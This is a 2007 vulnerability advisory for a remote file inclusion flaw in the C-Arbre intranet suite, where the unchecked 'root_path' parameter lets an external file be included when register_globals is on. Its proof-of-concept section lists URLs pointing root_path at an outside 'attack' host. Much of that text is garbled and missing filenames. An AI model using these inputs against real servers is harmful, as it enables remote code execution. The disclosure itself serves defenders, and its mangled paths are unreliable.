ECHO_ADV_78$2007 ------------------------------------------------------------------------ ----------------- [ECHO_ADV_78$2007] C-Arbre <= 0.6PR7 (root_path) Remote File Inclusion Vulnerability ------------------------------------------------------------------------ ----------------- Author : M.Hasran Addahroni Date : March, 26th 2007 Location : Australia, Sydney Web : Critical Lvl : Dangerous Impact : System access Where : From Remote ------------------------------------------------------------------------ --- Affected software description: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Application : C-Arbre version : <= 0.6PR7 Vendor : Download : Description : C-Arbre is an integrated Intranet/Web software suite oriented towards knowledge management. Some of its key features include a CMS, a documents repository, handling of collaborative work and editions, templates engineering, support for DocBook XML, XHTML and Wiki style, permissions and work flow, a search engine with full text indexing, logging of actions, a cache system, groupware tools (calendar, Web mail, mailing lists, etc.), automatic generation of a Web portal, and internationalization of the interface. ------------------------------------------------------------------------ --- Vulnerability: ~~~~~~~~~~~~~~ - Invalid include function at lib/ : ----------------lib/ <?php //try to integrate the wikimedia engine functions include_once("$root_path/include/"); ... ---------------------------------------------------------------- Input passed to the "root_path" parameter in lib/ is not properly verified before being used to include files. This can be exploited to include arbitrary files from local or external resources. Successful exploitation requires that "register_globals" is enabled. also affected files : lib/adddocfile.php lib/auth_check.php lib/ lib/docfile_details.php lib/main.php lib/mainarticle.php lib/maindocfile.php lib/modify.php lib/new.php lib/resource_details.php lib/smallsearch.php mwiki/LocalSettings.php Poc/Exploit: ~~~~~~~~~~[C-Abre_path]/lib/ ath=[C-Abre_path]/lib/adddocfile.php?root_path=http://[C-Abre_path]/lib/auth_check.php?root_path=http://[C-Abre_path]/lib/ root_path=[C-Abre_path]/lib/docfile_details.php?root_path=ht tp://[C-Abre_path]/lib/main.php?root_path=http://attack Solution: ~~~~~~~ - Edit the source code to ensure that input is properly verified. - Turn off register_globals Notification: ~~~~~~~ - 19-03-2007 bugs found - 26-03-2007 vendor contacted - 27-03-2007 advisory released ------------------------------------------------------------------------ --- Shoutz: ~~~~~ ~ ping - my dearest wife, and my little son, for all the luv the tears n the breath ~ y3dips,the_day,moby,comex,z3r0byt3,c-a-s-e,S`to,lirva32,negative, str0ke (for the best comments) ~ masterpop3,maSter-oP,Lieur-Euy,Mr_ny3m,bithedz,murp,an0maly,fleanux,bayl aw ~ SinChan,h4ntu,cow_1seng,sakitjiwa, m_beben, rizal, cR4SH3R, madkid, kuntua, stev_manado, nofry, x16 ~ newbie_hacker (at) yahoogroups (dot) com [email concealed] ~ #aikmel #e-c-h-o ------------------------------------------------------------------------ --- Contact: ~~~~~~ K-159 || echo|staff || eufrato[at]gmail[dot]com Homepage: -------------------------------- [ EOF ] ----------------------------------